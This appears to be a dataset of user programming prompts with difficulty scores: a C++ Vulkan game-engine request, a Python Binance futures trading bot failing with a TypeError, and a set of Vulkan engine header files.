{ { 0.5f, -0.5f, -0.5f}, {0.0f, 1.0f, 0.0f}, {1.0f, 0.0f} }, // bottom-right-back
{ { 0.5f, 0.5f, -0.5f}, {0.0f, 0.0f, 1.0f}, {1.0f, 1.0f} }, // top-right-back
{ {-0.5f, 0.5f, -0.5f}, {1.0f, 1.0f, 0.0f}, {0.0f, 1.0f} }, // top-left-back
{ {-0.5f, -0.5f, 0.5f}, {0.0f, 1.0f, 1.0f}, {1.0f, 0.0f} }, // bottom-left-front
{ { 0.5f, -0.5f, 0.5f}, {1.0f, 1.0f, 1.0f}, {0.0f, 0.0f} }, // bottom-right-front
{ { 0.5f, 0.5f, 0.5f}, {1.0f, 0.0f, 1.0f}, {0.0f, 1.0f} }, // top-right-front
{ {-0.5f, 0.5f, 0.5f}, {0.0f, 0.0f, 0.0f}, {1.0f, 1.0f} }, // top-left-front
};
// Two triangles per face, counter-ordered per the comments below.
std::vector<uint32_t> indices = {
0, 1, 2, 2, 3, 0, // back face
0, 3, 7, 7, 4, 0, // left face
4, 7, 6, 6, 5, 4, // front face
1, 5, 6, 6, 2, 1, // right face
3, 2, 6, 6, 7, 3, // top face
0, 4, 5, 5, 1, 0 // bottom face
};
// Initialize mesh and material for the square tile
// NOTE(review): absolute C:/ paths will break on any other machine — make these configurable.
squareTile->GetMesh()->Initialize(vertices, indices, *renderer.GetDevice(), *renderer.GetPhysicalDevice(), *renderer.GetCommandPool(), *renderer.GetGraphicsQueue());
squareTile->GetMaterial()->Initialize("C:/shaders/vert_depth.spv", "C:/shaders/frag_depth.spv", "C:/textures/texture.jpg", *renderer.GetDevice(), descriptorSetLayout, descriptorPool, *renderer.GetPhysicalDevice(), *renderer.GetCommandPool(), *renderer.GetGraphicsQueue());
squareTile->Initialize2(renderer);
// Add the square tile GameObject to the scene
scene.AddGameObject(squareTile);
/*Terrain terrain(0,10,1,renderer.GetDevice(), renderer.GetPhysicalDevice(), renderer.GetCommandPool(), renderer.GetGraphicsQueue());
terrain.GenerateTerrain(descriptorSetLayout, samplerDescriptorSetLayout, descriptorPool);*/
//scene.AddGameObject(terrain.GetTerrainObject());
float deltaTime = window.GetDeltaTime(); // NOTE(review): result unused — looks like leftover debug code.
}
void Engine::MainLoop()
{
while (!window.ShouldClose())
{
window.PollEvents();
float deltaTime = window.GetDeltaTime();
Update(deltaTime);
Render();
auto sleep_duration = std::chrono::milliseconds(1000 / MaxFPS);
std::this_thread::sleep_for(sleep_duration);
}
}
void Engine::Update(float deltaTime)
{
scene.Update(deltaTime);
}
void Engine::Render()
{
renderer.BeginFrame();
scene.Render(renderer);
renderer.EndFrame();
}
void Engine::Shutdown()
{
vkDeviceWaitIdle(*renderer.GetDevice());
// Clean up resources in reverse order
scene.Shutdown();
renderer.Shutdown();
window.Shutdown();
}
Can you improve the code for the Engine class?
|
7a5e9b9760e63d44dfe37b294f60ad52
|
{
"intermediate": 0.4166281521320343,
"beginner": 0.35532474517822266,
"expert": 0.22804704308509827
}
|
11,292
|
hi
|
ff35108df203df2e22114d2467f0b48a
|
{
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
}
|
11,293
|
I used this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
import ntplib
import os
API_KEY = ''
API_SECRET = ''
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
# Load the market symbols
def sync_time():
ntp_client = ntplib.NTPClient()
response = ntp_client.request('pool.ntp.org', version=3)
now = time.time()
offset = response.offset
new_time = now + offset
# Set the system clock to the new time
os.system(f'sudo date -s @{int(new_time)}')
print(f'New time: {dt.datetime.now()}')
recv_window = 10000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
return exchange.fetch_time()
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
try:
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
except requests.exceptions.RequestException as e:
print(f'Error in get_klines: {e}')
return None
df = get_klines(symbol, '1m', 44640)
def signal_generator(df):
open = df.Open.iloc[-1]
close = df.Close.iloc[-1]
previous_open = df.Open.iloc[-2]
previous_close = df.Close.iloc[-2]
# Bearish pattern
if (open>close and
previous_open<previous_close and
close<previous_open and
open>=previous_close):
return 'sell'
# Bullish pattern
elif (open<close and
previous_open>previous_close and
close>previous_open and
open<=previous_close):
return 'buy'
# No clear pattern
else:
return ""
df = get_klines(symbol, '1m', 44640)
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Adjust quantity if opposite position exists
if opposite_position is not None:
quantity = round_step_size(abs(float(opposite_position['positionAmt'])), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '1m', 44640) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
if signal:
order_execution(symbol, signal, MAX_TRADE_QUANTITY_PERCENTAGE, leverage, order_type)
time.sleep(0.1)
But I getting ERROR: The signal time is: 2023-06-10 14:18:00:
The signal time is: 2023-06-10 14:18:01:sell
Error closing position: {}
Traceback (most recent call last):
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 292, in <module>
order_execution(symbol, signal, MAX_TRADE_QUANTITY_PERCENTAGE, leverage, order_type)
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 257, in order_execution
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
TypeError: unsupported operand type(s) for *: 'NoneType' and 'float'
|
2598ff5f5680378d64e0d0ac21b5c547
|
{
"intermediate": 0.47261640429496765,
"beginner": 0.3915380835533142,
"expert": 0.1358455866575241
}
|
11,294
|
I’m building a video game engine using C++ as the coding language and Vulkan for graphics. I am trying to set up a generic renderer using Vulkan that is flexible and will render objects based on a vector that is supplied to it. The renderer will also handle the creation of the window using GLFW and use GLM for all relevant math calls. I am using the ASSIMP library to load 3d models and animations.
Here is a portion of the code:
BufferUtils.h:
#pragma once
#include <vulkan/vulkan.h>
#include <stdint.h>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory);
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties);
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size);
}
Camera.h:
#pragma once
#include <glm/glm.hpp>
class Camera
{
public:
Camera();
~Camera();
void Initialize(float aspectRatio);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
const glm::mat4& GetViewMatrix() const;
const glm::mat4& GetProjectionMatrix() const;
private:
glm::vec3 position;
glm::vec3 rotation;
glm::mat4 viewMatrix;
glm::mat4 projectionMatrix;
void UpdateViewMatrix();
};
Engine.h:
#pragma once
#include "Window.h"
#include "Renderer.h"
#include "Scene.h"
#include <chrono>
#include <thread>
class Engine
{
public:
Engine();
~Engine();
void Run();
void Shutdown();
int MaxFPS = 60;
private:
void Initialize();
void MainLoop();
void Update(float deltaTime);
void Render();
Window window;
Renderer renderer;
Scene scene;
};
GameObject.h:
#pragma once
#include <glm/glm.hpp>
#include "Mesh.h"
#include "Material.h"
#include "Camera.h"
#include "Renderer.h"
class GameObject
{
public:
GameObject();
~GameObject();
void Initialize();
void Initialize2(Renderer& renderer);
void Update(float deltaTime);
void Render(Renderer& renderer, const Camera& camera);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
void SetScale(const glm::vec3& scale);
Mesh* GetMesh();
Material* GetMaterial();
private:
glm::mat4 modelMatrix;
glm::vec3 position;
glm::vec3 rotation;
glm::vec3 scale;
VkDeviceMemory mvpBufferMemory;
VkBuffer mvpBuffer;
Mesh* mesh;
Material* material;
bool initialized = false;
void UpdateModelMatrix();
};
Material.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Texture.h"
#include "Shader.h"
#include <stdexcept>
#include <memory> // Don’t forget to include <memory>
#include <array>
// Add this struct outside the Material class, possibly at the top of Material.cpp
struct ShaderDeleter {
void operator()(Shader* shaderPtr) {
if (shaderPtr != nullptr) {
Shader::Cleanup(shaderPtr);
}
}
};
class Material
{
public:
Material();
~Material();
void Initialize(const std::string& vertShaderPath, const std::string& fragShaderPath, const std::string& texturePath, VkDevice device, VkDescriptorSetLayout descriptorSetLayout, VkDescriptorPool descriptorPool, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
void LoadTexture(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void LoadShaders(const std::string& vertFilename, const std::string& fragFilename, VkDevice device);
void UpdateBufferBinding(VkBuffer newBuffer, VkDevice device, VkDeviceSize devicesize);
VkDescriptorSet GetDescriptorSet() const;
VkPipelineLayout GetPipelineLayout() const;
std::shared_ptr <Shader> GetvertexShader();
std::shared_ptr <Shader> GetfragmentShader();
void CreateDescriptorSet(VkBuffer uniformBuffer, VkDeviceSize bufferSize);
private:
VkDevice device;
std::shared_ptr <Shader> vertexShader;
std::shared_ptr <Shader> fragmentShader;
std::shared_ptr<Texture> texture;
void CreatePipelineLayout(VkDescriptorSetLayout descriptorSetLayout);
VkDescriptorSet descriptorSet;
VkPipelineLayout pipelineLayout;
VkDescriptorSetLayout descriptorSetLayout;// = VK_NULL_HANDLE;
VkDescriptorPool descriptorPool;
void CleanupDescriptorSetLayout();
};
Mesh.h:
#pragma once
#include <vector>
#include <vulkan/vulkan.h>
#include <glm/glm.hpp>
#include "BufferUtils.h"
struct Vertex {
glm::vec3 position;
glm::vec3 color;
glm::vec2 texCoord;
};
class Mesh
{
public:
Mesh();
~Mesh();
void Initialize(std::vector<Vertex> vertices, std::vector<uint32_t> indices, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Initialize(VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Vertex>& GetVertices() const;
const std::vector<uint32_t>& GetIndices() const;
VkBuffer GetVertexBuffer() const;
VkBuffer GetIndexBuffer() const;
void SetVertices(const std::vector<Vertex>& vertices);
void SetIndices(const std::vector<uint32_t>& indices);
std::vector<VkVertexInputBindingDescription> GetVertexInputBindingDescriptions() const;
std::vector<VkVertexInputAttributeDescription> GetVertexInputAttributeDescriptions() const;
private:
VkDevice device;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
VkBuffer vertexBuffer;
VkDeviceMemory vertexBufferMemory;
VkBuffer indexBuffer;
VkDeviceMemory indexBufferMemory;
};
Model.h:
#pragma once
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
#include <assimp/postprocess.h>
#include "Mesh.h"
#include <string>
#include <vector>
#include <vulkan/vulkan.h>
#include <stdexcept>
class Model
{
public:
Model();
~Model();
void LoadModel(const std::string& filepath, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Mesh>& GetMeshes() const;
private:
std::vector<Mesh> meshes;
void LoadNode(aiNode* node, const aiScene* scene, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
Mesh LoadMesh(aiMesh* mesh, const aiScene* scene);
};
Pipeline.h:
#pragma once
#include <vulkan/vulkan.h>
#include <vector>
#include <array>
#include <stdexcept>
#include "Shader.h"
class Pipeline
{
public:
Pipeline();
~Pipeline();
void CreateGraphicsPipeline(const std::vector<VkVertexInputBindingDescription>& vertexBindingDescriptions,
const std::vector<VkVertexInputAttributeDescription>& vertexAttributeDescriptions,
VkExtent2D swapchainExtent,
const std::vector<Shader*>& shaders,
VkRenderPass renderPass,
VkPipelineLayout pipelineLayout,
VkDevice device);
void Cleanup();
VkPipeline GetPipeline() const;
bool IsInitialized() const;
private:
VkDevice device;
VkPipeline pipeline;
bool initialized;
void CreateShaderStages(const std::vector<Shader*>& shaders, std::vector<VkPipelineShaderStageCreateInfo>& shaderStages);
};
Renderer.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Window.h"
#include <vector>
#include <stdexcept>
#include <set>
#include <optional>
#include <iostream>
#include "Pipeline.h"
#include "Material.h"
#include "Mesh.h"
struct QueueFamilyIndices
{
std::optional<uint32_t> graphicsFamily;
std::optional<uint32_t> presentFamily;
bool IsComplete()
{
return graphicsFamily.has_value() && presentFamily.has_value();
}
};
struct SwapChainSupportDetails {
VkSurfaceCapabilitiesKHR capabilities;
std::vector<VkSurfaceFormatKHR> formats;
std::vector<VkPresentModeKHR> presentModes;
};
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
};
class Renderer
{
public:
Renderer();
~Renderer();
void Initialize(GLFWwindow* window);
void Shutdown();
void BeginFrame();
void EndFrame();
VkDescriptorSetLayout CreateDescriptorSetLayout();
VkDescriptorPool CreateDescriptorPool(uint32_t maxSets);
VkDevice* GetDevice();
VkPhysicalDevice* GetPhysicalDevice();
VkCommandPool* GetCommandPool();
VkQueue* GetGraphicsQueue();
VkCommandBuffer* GetCurrentCommandBuffer();
std::shared_ptr<Pipeline> GetPipeline();
void CreateGraphicsPipeline(Mesh* mesh, Material* material);
std::pair<VkBuffer, VkDeviceMemory> RequestMvpBuffer();
private:
bool isShutDown = false;
static const uint32_t kMvpBufferCount = 3;
std::vector<VkBuffer> mvpBuffers;
std::vector<VkDeviceMemory> mvpBufferMemory;
uint32_t currentMvpBufferIndex = 0;
bool shutdownInProgress;
uint32_t currentCmdBufferIndex = 0;
std::vector<size_t> currentFramePerImage;
std::vector<VkImage> swapChainImages;
std::vector<VkImageView> swapChainImageViews;
VkExtent2D swapChainExtent;
VkRenderPass renderPass;
uint32_t imageIndex;
std::shared_ptr<Pipeline> pipeline;
VkFormat swapChainImageFormat;
std::vector<VkCommandBuffer> commandBuffers;
void CreateImageViews();
void CleanupImageViews();
void CreateRenderPass();
void CleanupRenderPass();
void CreateSurface();
void DestroySurface();
void CreateInstance();
void CleanupInstance();
void ChoosePhysicalDevice();
void CreateDevice();
void CleanupDevice();
void CreateSwapchain();
void CleanupSwapchain();
void CreateCommandPool();
void CleanupCommandPool();
void CreateFramebuffers();
void CleanupFramebuffers();
void CreateCommandBuffers();
void CleanupCommandBuffers();
void Present();
GLFWwindow* window;
VkInstance instance = VK_NULL_HANDLE;
VkPhysicalDevice physicalDevice = VK_NULL_HANDLE;
VkDevice device = VK_NULL_HANDLE;
VkSurfaceKHR surface;
VkSwapchainKHR swapchain;
VkCommandPool commandPool;
VkCommandBuffer currentCommandBuffer;
std::vector<VkFramebuffer> framebuffers;
// Additional Vulkan objects needed for rendering…
const uint32_t kMaxFramesInFlight = 2;
std::vector<VkSemaphore> imageAvailableSemaphores;
std::vector<VkSemaphore> renderFinishedSemaphores;
std::vector<VkFence> inFlightFences;
size_t currentFrame;
VkQueue graphicsQueue;
VkQueue presentQueue;
void CreateSyncObjects();
void CleanupSyncObjects();
SwapChainSupportDetails querySwapChainSupport(VkPhysicalDevice device, VkSurfaceKHR surface);
VkSurfaceFormatKHR chooseSwapSurfaceFormat(const std::vector<VkSurfaceFormatKHR>& availableFormats);
VkPresentModeKHR chooseSwapPresentMode(const std::vector<VkPresentModeKHR>& availablePresentModes);
VkExtent2D chooseSwapExtent(const VkSurfaceCapabilitiesKHR& capabilities, GLFWwindow* window);
std::vector<const char*> deviceExtensions = {
VK_KHR_SWAPCHAIN_EXTENSION_NAME
};
std::vector<const char*> CheckPhysicalDeviceExtensionSupport(VkPhysicalDevice physicalDevice);
QueueFamilyIndices GetQueueFamilyIndices(VkPhysicalDevice physicalDevice);
};
Scene.h:
#pragma once
#include <vector>
#include "GameObject.h"
#include "Camera.h"
#include "Renderer.h"
class Scene
{
public:
Scene();
~Scene();
void Initialize();
void Update(float deltaTime);
void Render(Renderer& renderer);
void Shutdown();
void AddGameObject(GameObject* gameObject);
Camera& GetCamera();
float temp;
private:
std::vector<GameObject*> gameObjects;
Camera camera;
};
Shader.h:
#pragma once
#include <vulkan/vulkan.h>
#include <string>
class Shader
{
public:
Shader();
~Shader();
void LoadFromFile(const std::string& filename, VkDevice device, VkShaderStageFlagBits stage);
VkPipelineShaderStageCreateInfo GetPipelineShaderStageCreateInfo() const;
static void Cleanup(Shader* shader);
private:
VkDevice device;
VkShaderModule shaderModule;
VkShaderStageFlagBits stage;
};
Simplex.h:
#pragma once
#ifndef SIMPLEX_H
#define SIMPLEX_H
#include <iostream>
class SimplexNoise {
private:
int testvar;
int grad3[12][3]{ { 1, 1, 0 }, { -1, 1, 0 }, { 1, -1, 0 },
{ -1, -1, 0 }, { 1, 0, 1 }, { -1, 0, 1 }, { 1, 0, -1 },
{ -1, 0, -1 }, { 0, 1, 1 }, { 0, -1, 1 }, { 0, 1, -1 },
{ 0, -1, -1 } };
int grad4[32][4] = { { 0, 1, 1, 1 }, { 0, 1, 1, -1 },
{ 0, 1, -1, 1 }, { 0, 1, -1, -1 }, { 0, -1, 1, 1 },
{ 0, -1, 1, -1 }, { 0, -1, -1, 1 }, { 0, -1, -1, -1 },
{ 1, 0, 1, 1 }, { 1, 0, 1, -1 }, { 1, 0, -1, 1 }, { 1, 0, -1, -1 },
{ -1, 0, 1, 1 }, { -1, 0, 1, -1 }, { -1, 0, -1, 1 },
{ -1, 0, -1, -1 }, { 1, 1, 0, 1 }, { 1, 1, 0, -1 },
{ 1, -1, 0, 1 }, { 1, -1, 0, -1 }, { -1, 1, 0, 1 },
{ -1, 1, 0, -1 }, { -1, -1, 0, 1 }, { -1, -1, 0, -1 },
{ 1, 1, 1, 0 }, { 1, 1, -1, 0 }, { 1, -1, 1, 0 }, { 1, -1, -1, 0 },
{ -1, 1, 1, 0 }, { -1, 1, -1, 0 }, { -1, -1, 1, 0 },
{ -1, -1, -1, 0 } };
int p_supply[256] = { 151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96,
53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94,
252, 219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87,
174, 20, 125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48,
27, 166, 77, 146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230,
220, 105, 92, 41, 55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63,
161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89, 18, 169, 200, 196,
135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173, 186, 3, 64,
52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255, 82,
85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101,
155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113,
224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193,
238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14,
239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204, 176,
115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180 };
// To remove the need for index wrapping, double the permutation table
// length
int perm[512] = {};
/*static {
for (int i = 0; i < 512; i++)
perm[i] = p[i & 255];
}*/
// A lookup table to traverse the simplex around a given point in 4D.
// Details can be found where this table is used, in the 4D noise method.
int simplex[64][4] = { { 0, 1, 2, 3 }, { 0, 1, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 2, 3, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 2, 3, 0 }, { 0, 2, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 3, 1, 2 }, { 0, 3, 2, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 3, 2, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 1, 2, 0, 3 }, { 0, 0, 0, 0 },
{ 1, 3, 0, 2 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 2, 3, 0, 1 }, { 2, 3, 1, 0 }, { 1, 0, 2, 3 }, { 1, 0, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 3, 1 },
{ 0, 0, 0, 0 }, { 2, 1, 3, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 0, 1, 2 }, { 3, 0, 2, 1 },
{ 0, 0, 0, 0 }, { 3, 1, 2, 0 }, { 2, 1, 0, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 1, 0, 2 }, { 0, 0, 0, 0 },
{ 3, 2, 0, 1 }, { 3, 2, 1, 0 } };
int p[256] = {};
int RANDOMSEED = 0;
int NUMBEROFSWAPS = 400;
public:
SimplexNoise(int inseed);
double noise(double xin, double yin);
double noise(double xin, double yin, double zin);
double noise(double xin, double yin, double zin, double win);
};
#endif
Terrain.h:
#pragma once
#include "Simplex.h"
#include "Mesh.h"
#include "Material.h"
#include "GameObject.h"
class Terrain {
public:
Terrain(int seed, int worldSize, float scale, VkDevice* device, VkPhysicalDevice* physicalDevice, VkCommandPool* commandPool, VkQueue* graphicsQueue);
~Terrain();
void GenerateTerrain(VkDescriptorSetLayout descriptorSetLayout, VkDescriptorSetLayout samplerDescriptorSetLayout, VkDescriptorPool descriptorPool);
GameObject* GetTerrainObject();
private:
void GenerateHeightMap();
void ConvertHeightMapToMeshData();
int seed;
int worldSize;
float scale;
VkDevice* device;
VkPhysicalDevice* physicalDevice;
VkCommandPool* commandPool;
VkQueue* graphicsQueue;
SimplexNoise noise;
std::vector<std::vector<float>> heightMap;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
Mesh* terrainMesh;
Material* terrainMaterial;
GameObject* terrainObject;
};
Texture.h:
#pragma once
#include <vulkan/vulkan.h>
#include "stb_image.h" // Include the stb_image header
#include "BufferUtils.h"
#include <string>
class Texture
{
public:
Texture();
~Texture();
void LoadFromFile(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
VkImageView GetImageView() const;
VkSampler GetSampler() const;
void Cleanup();
private:
VkDevice device;
VkImage image;
VkDeviceMemory imageMemory;
VkImageView imageView;
VkSampler sampler;
VkPhysicalDevice physicalDevice;
VkCommandPool commandPool;
VkQueue graphicsQueue;
bool initialized = false;
void CreateImage(uint32_t width, uint32_t height, uint32_t mipLevels, VkSampleCountFlagBits numSamples,
VkFormat format, VkImageTiling tiling, VkImageUsageFlags usage, VkMemoryPropertyFlags properties);
void TransitionImageLayout(VkImageLayout oldLayout, VkImageLayout newLayout,
uint32_t mipLevels, VkSampleCountFlagBits numSamples);
void CopyBufferToImage(VkBuffer buffer, uint32_t width, uint32_t height);
void CreateImageView(VkFormat format, VkImageAspectFlags aspectFlags, uint32_t mipLevels);
